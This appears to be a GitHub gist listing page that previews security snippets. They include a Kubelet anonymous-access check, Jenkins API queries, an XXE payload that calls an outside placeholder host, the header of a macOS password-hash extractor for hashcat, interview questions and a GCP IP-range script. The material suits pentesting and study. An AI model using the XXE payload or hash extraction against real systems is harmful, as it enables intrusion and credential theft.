Skip to content

Instantly share code, notes, and snippets.

Avatar

Chris Gates carnal0wnage

View GitHub Profile
View README.md
@lizrice
lizrice / kubelet-api.md
Last active Aug 9, 2022
Checking Kubelet API access
View kubelet-api.md

Accessing Kubelet API

curl -sk https://localhost:10250/pods/
  • If --anonymous-auth is turned off, you will see a 401 Unauthorized response.
  • If --anonymous-auth is true and --authorization-mode is Webhook you'll see 403 Forbidden response with message Forbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy)
  • If --anonymous-auth is true and --authorization-mode is AlwaysAllow you'll see a list of pods.
View jenkins-api.md

jobs

jenkins_url + /api/json?tree=jobs[name,color]

builds

jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]

last build

@jhaddix
jhaddix / Github bash generated search links (from hunter.sh)
Created Jan 12, 2020
Github bash generated search links (from hunter.sh)
View Github bash generated search links (from hunter.sh)
View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@teddziuba
teddziuba / osx_extract_hash.py
Last active Jul 28, 2022
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
View osx_extract_hash.py
#!/usr/bin/env python3
"""
Mac OSX Catalina User Password Hash Extractor
Extracts a user's password hash as a hashcat-compatible string.
Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords
(hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist
format, so previously reported methods for extracting the hash don't work.
@namishelex01
namishelex01 / Security Engineer - Interview Questions.md
Last active Jul 24, 2022
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names
View Security Engineer - Interview Questions.md

Core Information Security

  • What is information security and how is it achieved?

  • What are the core principles of information security?

  • What is the CIA triangle?

  • What is non-repudiation (as it applies to IT security)?

@n0531m
n0531m / list_gcp_iprange.sh
Last active Jul 18, 2022
Google Cloud Platform : ip address range
View list_gcp_iprange.sh
#!/bin/bash
# https://cloud.google.com/compute/docs/faq#find_ip_range
# nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8
myarray=()
for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :`
do
myarray+=($LINE)
for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`